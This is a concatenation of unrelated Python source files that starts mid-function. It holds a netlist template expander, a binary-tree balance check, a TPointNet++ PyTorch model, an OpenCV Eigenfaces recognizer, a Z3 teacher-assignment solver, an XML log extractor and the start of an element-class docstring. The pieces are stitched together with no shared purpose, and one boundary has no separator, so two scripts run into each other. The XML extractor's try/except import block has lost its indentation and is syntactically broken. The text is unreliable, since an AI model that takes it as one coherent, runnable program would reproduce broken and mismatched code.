        # if vf==0 and self.bias[0]==len(self.map[0])-1:
        #     return 0
        if self.bias[vf-1]==len(self.map[vf-1])-1: #if previous column is last element
            self.check_end(vf-1)
        else:
            self.bias[vf-1]+=1
        return 1
    def combinate(self):
        """Recursively walk the variable cursors, appending one full
        combination to self.comblist each time the last variable is reached."""
        # print self.map[self.vv][self.bias[self.vv]]
        self.smlcy+=1
        if self.vv==len(self.map)-1: #last variable
            self.bigcy+=1
            # Emit the current combination: one value per variable column.
            for vprint in range(0,len(self.map)):
                self.comblist[vprint].append(self.map[vprint][self.bias[vprint]])
                #print self.map[vprint][self.bias[vprint]]
            if self.bias[self.vv]==len(self.map[self.vv])-1: #last element
                if self.smlcy<self.n_smlcycle:
                    self.check_end(self.vv)
                    self.vv=(self.vv+1)%len(self.map)
                    self.combinate()
                else:
                    pass
            else:
                self.bias[self.vv]+=1
                self.vv=(self.vv+1)%len(self.map)
                self.combinate()
        else:
            self.vv=(self.vv+1)%len(self.map)
            self.combinate()
##############################################################
######### netmap ########################
##############################################################
### This class is used for replacing lines ################
### detects @@ for line and @ for nets #######################
##############################################################
#-------- EXAMPLE ---------------------------------------#
### netmap1=netmap(2) %input num_var #########################
### netmap1.get_var('ab','NN',1,4,1) %flag MUST be 2 char ####
## netmap2.get_var('bc','DD',2,5,1) %length of var must match#
# !!caution: do get_var in order, except for lateral prints ##
### which is using @W => variables here, do get_var at last ##
### for line in r_file.readlines():###########################
### netmap1.printline(line,w_file) #######################
##############################################################
class netmap:
    """Template expander for netlist generation.

    Lines beginning with '@@' are repeated once per registered value, with
    each '@xy' two-character flag replaced by the matching net name/value.
    Lines beginning with '@W' expand all values of a flag laterally on one
    line.  Flags MUST be exactly two characters.
    """
    #def __init__(self,num_var):
    # self.size=num_var
    # self.map=[None]*self.size
    # self.flag=[None]*self.size
    # self.name=[None]*self.size
    # self.nnet=[None]*self.size
    # self.nn=0
    # self.pvar=1
    # self.cnta=0
    # self.line_nvar=0 # index of last variable for this line
    # self.nxtl_var=0 # index of variable of next line
    # self.ci_at=100
    def __init__(self):
        self.nn=0       # number of registered nets/flags
        self.pvar=1     # 1-based index of the value currently being emitted
        self.cnta=0     # count of '@' flags seen on the current line
        self.line_nvar=0 # index of last variable for this line
        self.nxtl_var=0 # index of variable of next line
        # column of the most recent '@'; the next two columns (the flag
        # characters) are skipped.  Starts negative so nothing is skipped.
        self.ci_at=-5
    def get_net(self,flag,netname,start,end,step): #if start==None: want to repeat without incrementation(usually for tab) (end)x(step) is the num of repetition
        """Register a net under two-character `flag`.

        Value modes: numeric sweep (start..end by step); start=='d2o'
        emits `end` binary digits with the first `step` of them 1
        (decimal-to-one-hot style); start==None repeats `end` `step` times.
        """
        if self.nn==0:
            self.map=[None]
            self.flag=[None]
            self.name=[None]
            self.nnet=[None]
        else:
            self.map.append(None)
            self.name.append(None)
            self.flag.append(None)
            self.nnet.append(None)
        # name[] records whether a printable net name was supplied.
        if netname==None:
            self.name[self.nn]=0
        else:
            self.name[self.nn]=1
        self.map[self.nn]=list([netname])
        self.flag[self.nn]=(flag)
        if start!=None and start!='d2o':
            # +step/10 guards the integer division against float round-off.
            self.nnet[self.nn]=int((end-start+step/10)//step+1)
            if self.name[self.nn]==1:
                for i in range(1,self.nnet[self.nn]+1):
                    self.map[self.nn].append('')
            else:
                for i in range(1,self.nnet[self.nn]+1):
                    self.map[self.nn].append(start+step*(i-1))
        elif start=='d2o':
            for i in range(0,end):
                if step-i>0:
                    self.map[self.nn].append(1)
                else:
                    self.map[self.nn].append(0)
                i+=1
        else:
            self.map[self.nn]=list([netname])
            for i in range(1,step+1):
                self.map[self.nn].append(end)
        # self.map[self.nn]=[None]*step
        # for i in range(1,self.nnet[self.nn]+1):
        #     self.map[self.nn][i]=None
        self.nn+=1
        #print self.map
    def add_val(self,flag,netname,start,end,step):
        """Append more values to the already-registered net `flag`
        (numeric sweep when start is given, else `end` repeated `step` times)."""
        varidx=self.flag.index(flag)
        if start!=None:
            nval=int((end-start+step/10)//step+1)
            for i in range(1,nval+1):
                self.map[varidx].append(start+step*(i-1))
        else:
            for i in range(1,step+1):
                self.map[varidx].append(end)
    def printline(self,line,wrfile):
        """Expand one template `line` into `wrfile`.

        '@@' lines are written once per value of the nets they reference;
        '@W' lines expand a flag's values laterally; other lines are copied
        through unchanged.
        """
        if line[0:2]=='@@':
            #print('self.ci_at=%d'%(self.ci_at))
            self.nline=line[3:len(line)]
            self.clist=list(self.nline) #character list
            #print(self.clist,self.nxtl_var)
            for iv in range (1,len(self.map[self.nxtl_var])):
                for ci in range(0,len(self.clist)):
                    # Skip the two flag characters following the last '@'.
                    if (ci==self.ci_at+1 or ci==self.ci_at+2) and ci!=len(self.clist)-1:
                        pass
                    elif self.clist[ci]=='@':
                        #print self.cnta
                        self.cnta+=1
                        self.line_nvar+=1
                        varidx=self.flag.index(self.clist[ci+1]+self.clist[ci+2])
                        if self.name[varidx]:
                            wrfile.write(self.map[varidx][0])
                        # print(self.map[varidx])
                        # Floats are printed in exponent form, ints as %d.
                        if type(self.map[varidx][self.pvar])==float:
                            wrfile.write('%e'%(self.map[varidx][self.pvar])) #modify here!!!!
                        elif type(self.map[varidx][self.pvar])==int:
                            wrfile.write('%d'%(self.map[varidx][self.pvar]))
                        self.ci_at=ci
                    elif ci==len(self.clist)-1: #end of the line
                        # At end of line either advance to the next value or,
                        # when all values were emitted, move on to the nets of
                        # the next '@@' line.
                        if self.pvar==len(self.map[self.nxtl_var+self.line_nvar-1])-1: #last element
                            self.pvar=1
                            self.nxtl_var=self.nxtl_var+self.line_nvar
                            self.line_nvar=0
                            self.cnta=0
                            self.ci_at=-6
                            #print('printed all var for this line, %d'%(ci))
                        else:
                            self.pvar+=1
                            #self.line_nvar=self.cnta
                            self.line_nvar=0
                            #print ('line_nvar= %d'%(self.line_nvar))
                            self.cnta=0
                        wrfile.write(self.clist[ci])
                    else:
                        wrfile.write(self.clist[ci])
        elif line[0:2]=='@W':
            #print('found word line')
            self.nline=line[3:len(line)]
            self.clist=list(self.nline)
            for ci in range(0,len(self.clist)):
                if (ci==self.ci_at+1 or ci==self.ci_at+2):
                    pass
                elif self.clist[ci]=='@':
                    varidx=self.flag.index(self.clist[ci+1]+self.clist[ci+2])
                    # Lateral expansion: all values of the flag on one line.
                    for iv in range(1,len(self.map[varidx])):
                        if self.name[varidx]:
                            wrfile.write(self.map[varidx][0])
                        wrfile.write('%d '%(self.map[varidx][iv]))
                        print ('n is %d, varidx=%d, iv=%d'%(self.map[varidx][iv],varidx,iv))
                    self.ci_at=ci
                else:
                    wrfile.write(self.clist[ci])
            self.ci_at=-5
        else:
            wrfile.write(line)
##############################################################
######### resmap ########################
##############################################################
### This class is used to deal with results ################
### detects @@ for line and @ for nets #######################
##############################################################
#-------- EXAMPLE ---------------------------------------#
### netmap1=netmap(2) %input num_var #########################
### netmap1.get_var('ab','NN',1,4,1) %flag MUST be 2 char ####
## netmap2.get_var('bc','DD',2,5,1) %length of var must match#
### for line in r_file.readlines():###########################
### netmap1.printline(line,w_file) #######################
###### self.tb[x][y][env[]]###############################
##############################################################
class resmap:
    """Collects simulation results per testbench and prepares plot axes.

    Layout: self.vl[testbench][variable] is the list of recorded values; the
    variable names live in self.vr.  plot_env()/plot_y() select x/y data by
    matching a variable against a fixed value.
    """
    def __init__(self,num_tb,num_words,index): #num_words includes index
        self.tb=[None]*num_tb
        self.tbi=[None]*num_tb
        self.vl=[None]*num_tb
        self.vlinit=[None]*num_tb
        self.svar=[None]*num_tb
        self.index=index
        self.nenv=0       # number of plot environments defined so far
        self.num_words=num_words
        self.vr=[None]*(num_words+index) #one set of variables per plot
        self.vidx=[None]*(num_words+index)
        self.env=[None]*(num_words+index)
        # self.vl=[None]*(num_words+index) #one set of variables per plot
        for itb in range(0,len(self.tb)):
            # self.tb[itb].vr=[None]*(num_words+index)
            self.tbi[itb]=0 #index for counting vars within tb
            self.vl[itb]=[None]*(num_words+index)
            self.vlinit[itb]=[0]*(num_words+index)
    def get_var(self,ntb,var):
        """Register variable name `var` at testbench `ntb`'s current cursor.

        NOTE(review): the name is stored in the shared self.vr, so all
        testbenches are assumed to record the same variables — confirm.
        """
        self.vr[self.tbi[ntb]]=(var)
        # self.vl[ntb][self.tbi[ntb]]=list([None])
        self.tbi[ntb]+=1
        if self.tbi[ntb]==len(self.vr): #????????
            self.tbi[ntb]=0
    def add(self,ntb,value):
        """Append `value` for testbench `ntb`'s current variable and advance
        the cursor round-robin over the variables."""
        if self.vlinit[ntb][self.tbi[ntb]]==0: #initialization
            self.vl[ntb][self.tbi[ntb]]=[value]
            self.vlinit[ntb][self.tbi[ntb]]+=1
        else:
            self.vl[ntb][self.tbi[ntb]].append(value)
        self.tbi[ntb]=(self.tbi[ntb]+1)%len(self.vr)
    def plot_env(self,ntb,start,step,xvar,xval): #setting plot environment: if ntb=='all': x axis is in terms of testbench
        """Define a plot environment: build the x axis and remember which
        sample indices have variable `xvar` equal to `xval`."""
        if ntb=='all':
            self.nenv+=1
            self.xaxis=[None]*len(self.tb)
            for i in range(0,len(self.tb)):
                self.xaxis[i]=start+i*step
            self.vidx[self.nenv]=self.vr.index(xvar)
            #print self.vl[0][self.vidx[self.nenv]]
            print('', self.vl[0][self.vidx[self.nenv]])
            # Indices (in testbench 0) where xvar matches the string form of xval.
            self.env[self.nenv]=[i for (i,x) in enumerate(self.vl[0][self.vidx[self.nenv]]) if x=='%s'%(xval)]
        else:
            self.nenv+=1
            self.xaxis=[None] #one output
            self.xaxis=[start]
            self.vidx[self.nenv]=self.vr.index(xvar)
            self.env[self.nenv]=[i for (i,x) in enumerate(self.vl[0][self.vidx[self.nenv]]) if x=='%s'%(xval)]
    def rst_env(self):
        """Clear the current plot environment selection."""
        self.vidx[self.nenv]=None
        self.env[self.nenv]=0
        self.nenv=0
        #print self.vl[0][self.vidx[self.nenv]]
    def plot_y(self,yvar):
        """Build self.yaxis from variable `yvar` at the first index selected
        by the current environment, one value per x-axis point."""
        self.yidx=self.vr.index(yvar)
        print ('yidx=%d'%(self.yidx))
        #print self.vl[0][self.yidx][self.env[self.nenv][0]]
        print('', self.vl[0][self.yidx][self.env[self.nenv][0]])
        self.yaxis=[None]*len(self.xaxis)
        for xx in range(0,len(self.xaxis)):
            self.yaxis[xx]=self.vl[xx][self.yidx][self.env[self.nenv][0]]
        #plt.plot(self.xaxis,self.yaxis)
        #plt.ylabel(self.vr[self.yidx])
    def sort(self,var):
        """Group, per testbench, every other variable's values keyed by the
        value of `var` at the same sample index (stored in self.svar)."""
        varidx=self.vr.index(var)
        for k in range(len(self.vl)): #all testbenches
            self.svar[k]={} #define dict
            for i in range(len(self.vl[0][0])): #all values
                self.svar[k][self.vl[k][varidx][i]]=[]
                for j in range(len(self.vr)): #all variables
                    if j!=varidx:
                        self.svar[k][self.vl[k][varidx][i]].append(self.vl[k][j][i])
            # if k==0:
            #     print self.svar[k]
|
# -*- coding:utf-8 -*-
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Balance:
    """Checks whether a binary tree is height-balanced (AVL property)."""
    def isBalance(self, root):
        """Return True when, for every node, the heights of its two
        subtrees differ by at most one."""
        _, balanced = self.isBalanceIter(root)
        return balanced
    def isBalanceIter(self, node):
        """Return (height, balanced) for the subtree rooted at `node`,
        short-circuiting as soon as an unbalanced subtree is found."""
        if node is None:
            return (0, True)
        left_height, left_ok = self.isBalanceIter(node.left)
        if not left_ok:
            return (left_height, False)
        right_height, right_ok = self.isBalanceIter(node.right)
        if not right_ok:
            return (right_height, False)
        height = max(left_height, right_height) + 1
        return (height, abs(left_height - right_height) <= 1)
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from .pointnet import PointNetfeat
from .pointnet2 import PointNet2feat as PointNet2
class TPointNet2(nn.Module):
    '''
    TPointNet++

    Extracts an initial z0 latent feature from a spatio-temporal point
    sequence and (optionally) regresses per-point TNOCS coordinates. A
    global PointNet runs over the whole (x, y, z, t) sequence while a
    per-timestep PointNet++ extracts local spatial features.
    '''
    def __init__(self, radii_list=[0.02, 0.05, 0.1, 0.2, 0.4, 0.8],
                       local_feat_size=512, # size of the PointNet++ features
                       out_feat_size=1600, # size of the output latent feature size from this model.
                       augment_quad=True, # whether to augment quadratic terms to input of PointNet++ (x^2, y^2, z^2)
                       augment_pairs=True, # whether to augment pairwise multiplied terms (xy, xz, yz)
                       tnocs_point_size=4, # components of each regressed TNOCS point
                       regress_tnocs=True): # if true, regresses TNOCS points in addition to extracting latent feature
        super(TPointNet2, self).__init__()
        self.augment_quad = augment_quad
        self.augment_pairs = augment_pairs
        self.tnocs_point_size = tnocs_point_size
        # PointNet++ feat output size
        self.local_feat_size = local_feat_size
        self.local_bottleneck_size = self.local_feat_size
        # PointNet feat size
        self.global_feat_size = 1024
        self.space_time_pt_feat = 64
        # out feature size
        self.latent_feat_size = out_feat_size
        # PointNet++ extra input features beyond x,y,z
        in_features = 0
        if self.augment_quad:
            print('Augmenting quadratic terms to input of PointNet++!')
            in_features += 3 # add quadratic terms
        if self.augment_pairs:
            print('Augmenting pairwise terms to input of PointNet++!')
            in_features += 3 # add pairwise terms
        self.local_extract = PointNet2(in_features=in_features,
                                       num_classes=self.local_feat_size, # size of the output
                                       batchnorm=False, # will use groupnorm instead
                                       use_xyz_feature=True, # also uses the coordinate as a feature
                                       use_random_ball_query=False,
                                       radii_list=radii_list,
                                       max_feat_prop_size=self.local_bottleneck_size
                                       )
        # PointNet over the full (x,y,z,t) sequence
        self.global_extract = PointNetfeat(input_dim=4, out_size=self.global_feat_size)
        # layers to get space-time feature
        per_point_out_size = self.global_feat_size + self.space_time_pt_feat + self.local_feat_size
        self.conv1 = torch.nn.Conv1d(per_point_out_size, per_point_out_size, 1)
        self.conv2 = torch.nn.Conv1d(per_point_out_size, self.latent_feat_size, 1)
        self.bn1 = nn.GroupNorm(16, per_point_out_size)
        self.bn2 = nn.GroupNorm(16, self.latent_feat_size)
        # regress TNOCS afterward
        self.regress_tnocs = regress_tnocs
        if self.regress_tnocs:
            self.conv3 = torch.nn.Conv1d(self.latent_feat_size, self.tnocs_point_size, 1) # output latent features besides just (x,y,z,t)
            # `reduce=False` is deprecated in torch; reduction='none' is the
            # modern spelling with identical behavior (per-element losses).
            self.loss_func = torch.nn.L1Loss(reduction='none')

    def forward(self, x):
        """x: (B, T, N, 4) point sequence -> (latent feature, TNOCS regression or None)."""
        B, T, N, _ = x.size()
        # Global spatio-temporal feature:
        # output is the per-point features concatenated with global feature
        global_input = x.view(B, T*N, 4).transpose(2, 1).contiguous()
        global_feat = self.global_extract(global_input)
        # Local spatial feature for each timestep
        spatial_in = x.view(B*T, N, 4)[:, :, :3] # only want spatial inputs
        local_in = spatial_in
        if self.augment_quad:
            # concat quadratic terms
            quad_terms = spatial_in * spatial_in
            local_in = torch.cat([spatial_in, quad_terms], dim=2)
        if self.augment_pairs:
            # concat pairwise mult terms
            xz = spatial_in[:, :, 0:1] * spatial_in[:, :, 2:3]
            xy = spatial_in[:, :, 0:1] * spatial_in[:, :, 1:2]
            yz = spatial_in[:, :, 2:3] * spatial_in[:, :, 1:2]
            local_in = torch.cat([local_in, xz, xy, yz], dim=2)
        local_feat = self.local_extract(local_in).view(B, T, N, -1)
        local_feat = local_feat.view(B, T*N, self.local_feat_size).transpose(2, 1).contiguous()
        # concat global and local features
        feat = torch.cat([local_feat, global_feat], dim=1)
        # process to get latent features output
        feat = F.relu(self.bn1(self.conv1(feat)))
        feat = self.bn2(self.conv2(feat))
        # further process to get TNOCS regression output
        tnocs_regression = None
        if self.regress_tnocs:
            tnocs_out = self.conv3(F.relu(feat))
            tnocs_regression = torch.sigmoid(tnocs_out[:, :self.tnocs_point_size, :])
            tnocs_regression = tnocs_regression.transpose(2, 1).contiguous() # B x T*N x 4
            tnocs_regression = tnocs_regression.view(B, T, N, self.tnocs_point_size)
        # max-pool over point-wise latent features to get a single output
        # feature (the argmax indices returned by torch.max were unused)
        feat = torch.max(feat, 2, keepdim=False)[0]
        return feat, tnocs_regression

    def loss(self, outputs, gt):
        '''
        Computes the loss for TNOCS regression given the outputs of the network compared to GT
        TNOCS values. Returns unreduced loss values (per-point).
        '''
        loss = self.loss_func(outputs, gt)
        return loss
import argparse
import cv2 as cv
import os
import numpy as np
import random
import sys
class Person():
    """One face-dataset sample: subject id, class label and image data."""
    def __init__(self, id, label, data):
        self.id = id        # subject number parsed from the file name
        self.label = label  # class label used for training/prediction
        self.data = data    # 1xN float64 row vector produced by get_image_data
def get_image_data(file_name):
    """Read *file_name* as grayscale and return it as a 1x6400 float64 row vector."""
    # NOTE(review): cv.imread returns None for unreadable files, which would
    # make resize raise — confirm all inputs are valid images.
    img = cv.imread(file_name, cv.IMREAD_GRAYSCALE)
    # Resize to 80x80
    dst = cv.resize(img, (80, 80))
    # Flatten to a single row vector; the transpose means pixels are taken
    # column-major from the image
    # shape = (rows, cols)
    dst = dst.T.reshape((1, dst.shape[1] * dst.shape[0]))
    # Convert from unsigned 8-bit to signed 64-bit float, keeping one channel.
    data = np.float64(dst)
    return data
def to_person(file_name: str) -> Person:
    r"""Build a Person from a file named "<id>_<label>.jpg".

    e.g. D:\xx\1_2.jpg -> Person(id=1, label=2, data=<pixels>).

    Uses os.path so the parsing works with the path separator of the
    current OS — the previous code hard-coded the Windows "\\" separator
    even though callers build paths with os.path.join.
    """
    stem = os.path.splitext(os.path.basename(file_name))[0]
    person_id, label = stem.split("_")
    return Person(int(person_id), int(label), get_image_data(file_name))
def load_dataset(path: str, p: int):
    """Split the .jpg images under *path* into train and test sets.

    Each person is assumed to contribute 10 consecutive samples once the
    list is sorted by id; `p` of them stay in train and the remaining
    10 - p are moved to test, chosen at random. Returns (train, test).
    """
    train = []
    test = []
    for root, _, files in os.walk(path):
        image_files = [os.path.join(root, file) for file in files if file.endswith(".jpg")]
        people = [to_person(file) for file in image_files]
        people.sort(key=lambda person: person.id)
        num_samples_per_person = 10
        index = 0
        while index < len(people):
            samples = people[index: index + num_samples_per_person]
            # randomly move samples to the test set until only p remain
            while len(samples) > p:
                i = random.randint(0, len(samples) - 1)
                test.append(samples.pop(i))
            # NOTE(review): when p == 10 the same samples end up in BOTH the
            # test and the train set — looks like full resubstitution, but
            # confirm this duplication is intended.
            if p == num_samples_per_person:
                test.extend(samples)
            train.extend(samples)
            index += num_samples_per_person
    return (train, test)
def run_EigenFaceRecognizer(path: str):
    """Train and evaluate OpenCV EigenFaces for a range of component counts.

    Uses a 70/30 train/test holdout (p = 7 of 10 samples per person) and
    prints accuracy plus min/max/mean prediction distances for each number
    of principal components. Output is identical to the original version;
    the dead `train = []` / `test = []` initializations, a stray semicolon
    and the duplicated corrects/true_positives counters were removed.
    """
    p = 7  # holdout de 70/30, treino/teste
    train, test = load_dataset(path, p)
    start_comps = 10
    max_comps = 21
    print(f"Dados de treino: {len(train)} casos")
    print(f"Dados de teste: {len(test)} casos")
    for num_components in range(start_comps, max_comps):
        model = cv.face.EigenFaceRecognizer_create(num_components)
        src = [person.data for person in train]
        labels = [person.label for person in train]
        model.train(src, np.asarray(labels))
        max_distance = sys.float_info.min
        min_distance = sys.float_info.max
        mean_distance = 0
        corrects = 0  # the former true_positives always equaled corrects
        for person in test:
            label, confidence = model.predict(person.data)
            if person.label == label:
                corrects += 1
            if confidence < min_distance:
                min_distance = confidence
            if confidence > max_distance:
                max_distance = confidence
            mean_distance += confidence
        acurracia = corrects / len(test) * 100
        mean_distance /= len(test)
        print(f"{num_components} componentes principais, acurácia: {acurracia:.2f}%")
        print(f"Corretos: {corrects}")
        print(f"Distância mínima: {min_distance}")
        print(f"Distância máxima: {max_distance}")
        print(f"Distância média: {mean_distance}")
        print("*" * 20)
# Argumentos para rodar o trabalho
parser = argparse.ArgumentParser()
parser.add_argument(
    '-p',
    '--databasepath',
    type=str,
    # raw string: '\d' in a plain literal is an invalid escape sequence
    # (SyntaxWarning on modern Python); the value itself is unchanged.
    default=r'.\dataset\ORL2',
    help='Caminho para a base de dados')
args = parser.parse_args()
run_EigenFaceRecognizer(args.databasepath)
import concurrent.futures
from tqdm import tqdm
import requests
from z3 import *
import math
import json
import time
# M = 3
# N = 13
# t = [3, 3, 4, 3, 4, 3, 3, 3, 4, 3, 3, 4, 4]
# c = [[0, 2, 3, 4, 8, 10], [0, 1, 3, 5, 6, 7, 8], [1, 2, 3, 7, 9, 11, 12]]
# S = [[2, 4, 8], [4, 10], [], [7, 9], [], [11, 12], [8, 12], [], [], [], [], [], []]
maximum_time = 18
minimum_time = 12
class Teacher():
    """A teacher and the collection of subject ids they can teach."""
    def __init__(self, set_subject=None):
        # The default used to be a mutable `[]` shared by every instance
        # created without arguments (the classic mutable-default-argument
        # bug); use None as the sentinel and build a fresh list per call.
        self.subject_teachable = [] if set_subject is None else set_subject
class School():
    """Z3 model that assigns subjects to teachers under load and conflict
    constraints. subject_assign[i] holds the teacher id of subject i."""
    def __init__(self,time_each_of_subject,list_of_teacher,constrain,maximum,minimum):
        # time_each_of_subject: periods per subject
        # constrain: pairs of subjects that must have different teachers
        # maximum/minimum: per-teacher load bounds (periods)
        self.time_each_of_subject = time_each_of_subject
        self.list_of_teacher = list_of_teacher
        self.number_subject,self.number_teacher = len(time_each_of_subject),len(list_of_teacher)
        self.constrain = constrain
        # one bitvector per subject, wide enough to hold any teacher id
        # without overflow in comparisons
        self.subject_assign = [BitVec('subject_'+str(i),self.number_teacher.bit_length()+1) for i in range(self.number_subject)]
        self.maximum_time,self.minimum_time = maximum,minimum
        self.s = Solver()
    def __str__(self):
        # Serialize the current model as JSON. Side effect: records the
        # heaviest per-teacher load in self.previous_max_time, which
        # better_solution() reads later.
        tmp_list = []
        self.previous_max_time = 0
        "Giao vien Danh sach mon hoc duoc phan cong So tiet\n"
        for i in range(self.number_teacher):
            tmp_dict = {}
            tmp_dict['Giao vien'] = i
            tmp_dict['Danh sach mon hoc duoc phan cong'] = ""
            the_sum = 0
            for j in range(self.number_subject):
                if self.s.model()[self.subject_assign[j]].as_long()==i:
                    tmp_dict['Danh sach mon hoc duoc phan cong'] += str(j)+","
                    the_sum += self.time_each_of_subject[j]
            tmp_dict['So tiet'] = the_sum
            if self.previous_max_time < the_sum:
                self.previous_max_time = the_sum
            tmp_list.append(tmp_dict)
        return json.dumps(tmp_list)
    def rule_0(self):# each subject assign smaller than number teacher
        # keep every assignment inside the valid teacher-id range
        for i in range(self.number_subject):
            self.s.add(self.subject_assign[i]<self.number_teacher)
            self.s.add(self.subject_assign[i]>=0)
    def rule_1(self):# pair subject can't assign by same teacher
        for x,y in self.constrain:
            self.s.add(self.subject_assign[x]!=self.subject_assign[y])
    def rule_2(self):# time each teacher must satisfier
        # each teacher's total load <= maximum, and either >= minimum or
        # the teacher gets no subjects at all
        for i in range(self.number_teacher):
            self.s.add(Sum([ If(self.subject_assign[j]==i,1,0)*self.time_each_of_subject[j] for j in range(self.number_subject) ]) <= self.maximum_time)
            self.s.add(Or(Sum([ If(self.subject_assign[j]==i,1,0)*self.time_each_of_subject[j] for j in range(self.number_subject) ]) >= self.minimum_time,And([ If(self.subject_assign[j]!=i,True,False) for j in range(self.number_subject) ]) ))
    def rule_2_reduce(self,id_teacher):# time each teacher must satisfier
        # same as rule_2 but for a single teacher, so solve_2 can add the
        # load constraints incrementally
        self.s.add(Sum([ If(self.subject_assign[j]==id_teacher,1,0)*self.time_each_of_subject[j] for j in range(self.number_subject) ]) <= self.maximum_time)
        self.s.add(Or(Sum([ If(self.subject_assign[j]==id_teacher,1,0)*self.time_each_of_subject[j] for j in range(self.number_subject) ]) >= self.minimum_time,And([ If(self.subject_assign[j]!=id_teacher,True,False) for j in range(self.number_subject) ]) ))
    def rule_3(self):# all subject must teach by the best teacher
        # a subject may only go to a teacher who can actually teach it
        for subject_id in range(self.number_subject):
            for teacher_id in range(self.number_teacher):
                if subject_id not in self.list_of_teacher[teacher_id].subject_teachable:
                    self.s.add(self.subject_assign[subject_id]!=teacher_id)
    def better_solution(self):# reduce maximum time highest teacher
        # force every teacher's load strictly below the best maximum seen
        # so far (self.previous_max_time, recorded by __str__)
        # self.next_solution()
        for i in range(self.number_teacher):
            self.s.add(Sum([ If(self.subject_assign[j]==i,1,0)*self.time_each_of_subject[j] for j in range(self.number_subject) ]) < self.previous_max_time)
    def next_solution(self):
        # exclude the current model so the next check() yields a different one
        self.s.add(Or([self.subject_assign[i]!=self.s.model()[self.subject_assign[i]].as_long() for i in range(self.number_subject)]))
    def solve_1(self):
        # add every rule up front, then solve once
        self.rule_0()
        self.rule_1()
        self.rule_2()
        self.rule_3()
        if self.s.check()==sat:
            return True
        return False
    def solve_2(self):
        # incremental variant of solve_1: structural rules first, then the
        # per-teacher load constraints one at a time (much faster on large
        # inputs, and fails early as soon as the model becomes unsat)
        self.rule_0()
        self.rule_1()
        if self.s.check()==sat:
            print("[?]Passing checkpoint 1")
            self.rule_3()
            if self.s.check()==sat:
                print("[?]Passing checkpoint 2")
                for i in tqdm(range(self.number_teacher)):
                    # print("[?]Sat teacher id:",i)
                    self.rule_2_reduce(i)
                    if self.s.check()==unsat:
                        return False
                if self.s.check()==sat:
                    return True
        return False
if __name__=="__main__":
    ## testing
    # small hand-written instance: 3 teachers, 13 subjects
    teacher_0 = Teacher(set([0, 2, 3, 4, 8, 10]))
    teacher_1 = Teacher(set([0, 1, 3, 5, 6, 7, 8]))
    teacher_2 = Teacher(set([1, 2, 3, 7, 9, 11, 12]))
    list_of_teacher = [teacher_0,teacher_1,teacher_2]
    time_each_of_subject = [3, 3, 4, 3, 4, 3, 3, 3, 4, 3, 3, 4, 4]
    constrain_subject = [(0,2),(0,4),(0,8),(1,4),(1,10),(3,7),(3,9),(5,11),(5,12),(6,8),(6,12)]
    '''
    logic input
    num_subject num_teacher
    subject_id number_time number_teachable list_teachable
    .....
    number_constrain
    subject_0 subject_1
    ....
    '''
    """
    ## too big
    executor = concurrent.futures.ThreadPoolExecutor(max_workers=6)
    data = requests.request("GET","https://raw.githubusercontent.com/dungkhmt/bkoptapplication/master/data/BCA/bca_input.txt")
    data = data.text.split('\n')
    number_subject,number_teacher = [int(i) for i in data[0].split(' ')]
    list_of_teacher = [Teacher([]) for _ in range(number_teacher)]
    time_each_of_subject = []
    constrain_subject = []
    print(number_subject,number_teacher)
    for i in range(1,number_subject+1):
        tmp = [int(i) for i in data[i][:-1].split(' ')]
        id_subject = tmp[0]
        time_each_of_subject.append(tmp[1])
        # print(tmp[0],tmp[1])
        for j in tmp[3:]:
            list_of_teacher[j].subject_teachable.append(id_subject)
            # print(j,list_of_teacher[j].subject_teachable,end=" ");
        # input()
    number_constrain = int(data[number_subject+1])
    print(number_constrain)
    for i in range(number_subject+2,number_subject+number_constrain+2):
        constrain_subject.append([int(j) for j in data[i].split(' ')])
    """
    # print(list_of_teacher[0].subject_teachable)
    # print(constrain_subject)
    # print(constrain_subject[0][0])
    # input()
    print("[*]Start counting!")
    start = time.time()
    school = School(time_each_of_subject,list_of_teacher,constrain_subject,maximum_time,minimum_time)
    if school.solve_2():## solve_1 run too long
        print("[+]First solution\n[?]Runtime:",time.time()-start)
        # keep tightening the maximum-load bound while the user asks for a
        # better assignment and the model stays satisfiable
        while school.s.check() == sat:
            print(school)
            if 'n' in input("[?] Get better result(Y/n)").lower():
                break
            school.better_solution()
        print("[!] No more better found!")
    else:
        print("[-]No solution found!\n[?]Runtime:",time.time()-start)
|
# -*- coding:utf-8 -*-
try:
from io import StringIO
except ImportError:
from StringIO import StringIO
from lxml import etree
OPTIONS = [
(('-p', '--path'), {'help': 'xml contains xpath criteria will be extracted', 'type': str}),
(('-b', '--body'), {'help': 'xpath element to extract when matching is found', 'type': str}),
(('-f', '--file'), {'help': 'input file', 'type': str}),
(('-o', '--output'), {'help': 'output file', 'type': str}),
(('-e', '--encoding'), {'help': 'output xml encoding (iso-8859-2, utf-8, ..)', 'type': str})
]
def add_arguments(parser):
    """Register every CLI option declared in OPTIONS on *parser*."""
    for flags, params in OPTIONS:
        parser.add_argument(*flags, **params)
def get_xml_lines(file):
    """Collect XML-looking lines from *file*.

    Every XML declaration is replaced by a '<break/>' separator marking the
    start of a new document; non-XML lines are dropped.
    """
    collected = []
    with open(file) as logfile:
        for raw in logfile:
            stripped = raw.strip()
            if stripped.startswith('<?xml'):
                collected.append('<break/>')
            elif stripped.startswith('<'):
                collected.append(stripped)
    return collected
def make_xml_list(file):
    """Yield one XML document string per '<?xml' declaration found in *file*."""
    joined = ''.join(get_xml_lines(file))
    return (doc for doc in joined.split('<break/>'))
def encode_reply(reply):
    """Return *reply* as text, decoding from UTF-8 when it is bytes."""
    try:
        decoded = reply.decode('utf-8')
    except AttributeError:
        # already a str (no .decode method)
        return reply
    return decoded
def extract_xml_from_file(path=None, body=None, input_file=None, output_file=None, encoding=None):
    """Append to *output_file* every XML document from *input_file* that
    matches the *path* XPath and has a non-empty *body* XPath result.

    encoding defaults to iso-8859-2; malformed documents are skipped.
    """
    encoding = encoding or 'iso-8859-2'
    with open(output_file, 'ab') as output:
        for xml in make_xml_list(input_file):
            try:
                root = etree.parse(StringIO(encode_reply(xml)))
            except etree.XMLSyntaxError:
                # not a well-formed document -> skip it
                continue
            found = root.xpath(path)
            if found:
                reply_tag = root.xpath(body)
                if reply_tag:
                    # write the whole matching document, not just the body
                    output.write(etree.tostring(
                        root,
                        encoding=encoding,
                        xml_declaration=True,
                        pretty_print=True
                    ))
|
# -*- coding: utf-8 -*-
"""
Author: Jef De Smet | jef.desmet@kuleuven.be
edited: Pieter Spaepen
Date: February 2020
Class of elements.
"""
"""
An element has at least:
elementNr          identifier of this element, must be chosen unique
firstNode          the starting node
secondNode         the ending node
